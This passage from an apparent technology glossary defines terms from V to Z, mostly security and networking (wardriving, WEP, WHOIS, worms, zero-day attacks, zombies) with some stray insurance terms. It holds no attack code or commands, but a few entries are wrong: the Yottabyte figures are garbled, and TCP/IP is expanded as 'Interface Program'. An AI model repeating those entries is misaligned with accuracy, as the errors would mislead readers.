A computer virus is a type of malware designed to spread from computer to computer and can replicate itself.
Voice Firewall
A Voice Firewall is a physical discontinuity in a voice network that monitors, alerts, and controls inbound, and outbound voice network activity based on user-defined call admission control (CAC) policies, voice application layer security threats or unauthorized service use violations.
Voice Intrusion Prevention System
A Voice Intrusion Prevention System (VIPS) is a security management system for voice networks that monitors voice traffic for multiple calling patterns or attack/abuse signatures to proactively detect and prevent toll fraud, denial of service, telecom attacks, service abuse, and other anomalous activities.
VPN
Virtual Private Network or VPN allows users to securely access a private network via an encrypted tunnel over the Internet.
Vulnerability
Vulnerabilities are bugs in software programs that hackers exploit to compromise computers.
W
WAP
A Wireless Application Protocol (WAP) is a specification for a set of communication protocols to standardize the way that wireless devices, such as cellular telephones and radio transceivers, can be used for Internet access, including e-mail, the World Wide Web, newsgroups, and Internet Relay Chat. A WAP browser is a web browser for mobile devices such as mobile phones that uses protocol.
War Chalking
War chalking is marking areas, usually on sidewalks with chalk, that receive wireless signals to advertise an open Wi-Fi network. War chalking was inspired by hobo symbols and was conceived by a group of friends in June 2002. They were publicized by Matt Jones who designed the set of icons and produced a downloadable document containing them.
War Dialer
A War dialer is a computer program that automatically dials a series of telephone numbers to locate lines connected to computer systems and catalogs those numbers so that a cracker or attacker can try to break into the systems.
War Dialing
War dialing is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, bulletin board systems (computer servers), and fax machines.
Wardriving
Wardriving is searching for Wi-Fi wireless networks by an individual in a moving vehicle while using a portable computer, smartphone, or personal digital assistant (PDA).
Warrant
An agreement that gives the holder the right to purchase an underlying financial instrument at a given price and time or at a series of prices and times according to a schedule or warrant agreement.
Warranty
Coverage that protects against manufacturer's defects past the normal warranty period and for repair after breakdown to return a product to its originally intended use. Warranty insurance protects consumers from financial loss caused by the seller's failure to rectify or compensate for defective or incomplete work and cost of parts and labor necessary to restore a product's usefulness. Includes but is not limited to coverage for all obligations and liabilities incurred by a service contract provider, mechanical breakdown insurance and service contracts written by insurers.
Weakness
A shortcoming or imperfection in software code, design, architecture, or deployment that, under proper conditions, could become a vulnerability.
Web Application Control
Web application control blocks unwanted applications that could cause security concerns such as P2P file sharing or instant messaging.
Web Application Firewall
Web application firewalls help keep your servers safe from hackers by scanning activity and identifying probes and attacks.
Web Crawling
A bot (automated script) that “crawls” the internet to collect web page information such as URL, meta tags, and links.
Web of Trust
The Web of trust is a concept used in PGP, GnuPG, and other OpenPGP-compatible systems to establish the authenticity of the binding between a public key and its owner. Its decentralized trust model is an alternative to the centralized trust model of a public key infrastructure (PKI), which relies exclusively on certificate authority.
Web Server
A Web server is a computer system that processes requests via HTTP, the basic network protocol used to distribute information on the World Wide Web. A web server is used to refer either the entire system, or specifically to the software that accepts and supervises the HTTP requests.
WEP
Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks defined in the standard IEEE 802.11b. It was introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognizable by the key of 10 or 26 hexadecimal digits, was at one time widely in use and was often the first security choice presented to users by router configuration tools.
Whitelist
A list of components that are authorized.
WHOIS
A WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. The protocol stores and delivers database content in a human-readable format. The WHOIS protocol is documented in RFC 3912.
Windowing
Windowing is the process of taking a small subset of a larger dataset for processing and analysis. In this approach, the rectangular window involves truncating the dataset before and after the window, while not modifying its contents.
Windowing System
A windowing system is a system that is used for sharing a computer’s graphical display presentation resources among multiple applications at the same time. A windowing system uses a window manager to track where each window is on the display screen and its size and status. A windowing system doesn’t just manage the windows but also other forms of graphical user interface entities.
Windump
A Windump is a freeware tool for Windows that is a protocol analyzer that can monitor network traffic on a wire.
Wired Equivalent Privacy
Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks defined in the standard IEEE 802.11b. It was introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognizable by the key of 10 or 26 hexadecimal digits, was at one time widely in use and was often the first security choice presented to users by router configuration tools.
Wireless Application Protocol
A Wireless Application Protocol (WAP) is a specification for a set of communication protocols to standardize the way that wireless devices, such as cellular telephones and radio transceivers, can be used for Internet access, including e-mail, the World Wide Web, newsgroups, and Internet Relay Chat. A WAP browser is a web browser for mobile devices such as mobile phones that uses protocol.
Wiretapping
Wiretapping is the process of monitoring and recording data flowing between two points in a communication system.
World Wide Web
The World Wide Web (WWW) is the global, hypermedia-based collection of information and services available on Internet servers and accessed by browsers using Hypertext Transfer Protocol and other information retrieval mechanisms.
Worm
A type of malware that replicates itself to spread to other computers.
Written Premium
The contractually determined amount charged by the reporting entity to the policyholder for the effective period of the contract based on the expectation of risk, policy benefits, and expenses associated with the coverage provided by the terms of the insurance contract.
WWW
The World Wide Web (WWW) is the global, hypermedia-based collection of information and services available on Internet servers and accessed by browsers using Hypertext Transfer Protocol and other information retrieval mechanisms.
X
X.400
X.400 was originally published in 1984 by CCITT and later re-written in 1988 jointly by ISO and CCITT. X.400 is a standard that conforms to layer 7 of the OSI and is a standard used for transporting e-mail messages. X.400 is an alternative standard to the commonly used SMTP and includes support for several transport connections including Ethernet, TCP/IP, and dial-up.
XHTML
XHTML is short for eXtensible HyperText Markup Language. XHTML is a hybrid between XML and HTML and designed for network devices as a method of displaying web pages on network and portable devices. XHTML was first released January 26, 2000.
XML
XML is short for eXtensible Markup Language. XML is a specification developed by W3C starting with the recommendation on February 10, 1998. XML is similar to HTML, XML uses tags to markup a document, allowing the browser to interpret the tags and display them on a page. Unlike HTML, XML language is unlimited (extensible) which allows self-defining tags and can describe the content instead of only displaying a page’s content. Using XML other languages such as RSS and MathML have been created, even tools like XSLT were created using XML.
XMPP
XMPP which stands for Extensible Messaging and Presence Protocol, is a communications protocol for messaging systems. It is based on XML, storing, and transmitting data in that format. It is used for sending and receiving instant messages, maintaining buddy lists, and broadcasting the status of one’s online presence. XMPP is an open protocol standard. Anyone can operate their own XMPP service and use it to interact with any other XMPP service. The standard is maintained by XSF, the XMPP Standards Foundation.
XMT
XMT is also called Transmit. XMT is the method of sending data to an alternate computer or device.
XNS
XNS is short for Xerox Network Services, XNS is a proprietary network communications protocol developed by Xerox. XNS is no longer used and has been replaced by Transmission Control Protocol / Interface Program (TCP/IP).
Y
Y2K
Y2K is short for Year 2000 Bug or the millennium bug. Y2K is a warning first published by Bob Bemer in 1971 describing the issues of computers using a two-digit year date stamp.
Ymodem
A Ymodem is a file-transfer protocol developed by Chuck Forsburg, that is similar to the enhanced 1K version of Xmodem. Ymodem sends data in 1024-byte blocks, allows for multiple file transmissions at once, performs cyclical redundancy checks (CRC), and can reduce the transfer size to compensate for poor connections.
Yottabyte
Yottabyte is abbreviated as YB. A yottabyte is equal to 1,208,925,819,614,629,174,706,176 (280) bits, or 1,000,000,000,000,000,000,000,000 (1024) bytes and is the largest recognized value used with storage.
Z
Zero-Day
A zero-day vulnerability is a flaw in the software, hardware or firmware that is unknown to the responsible parties for patching or fixing the flaw.
Zero-day Attack
A zero-day (or zero hour or day zero) attack is a computer threat that attempts to manipulate the computer application vulnerabilities that are undisclosed to the software developer. Zero-day exploits is the actual code that can use a security hole to carry out an attack. These exploits are used or shared by attackers before the software developer knows about the vulnerability.
Zombies
A zombie is an infected computer that is remotely controlled by a hacker. It is part of a large group of compromised computers called a botnet.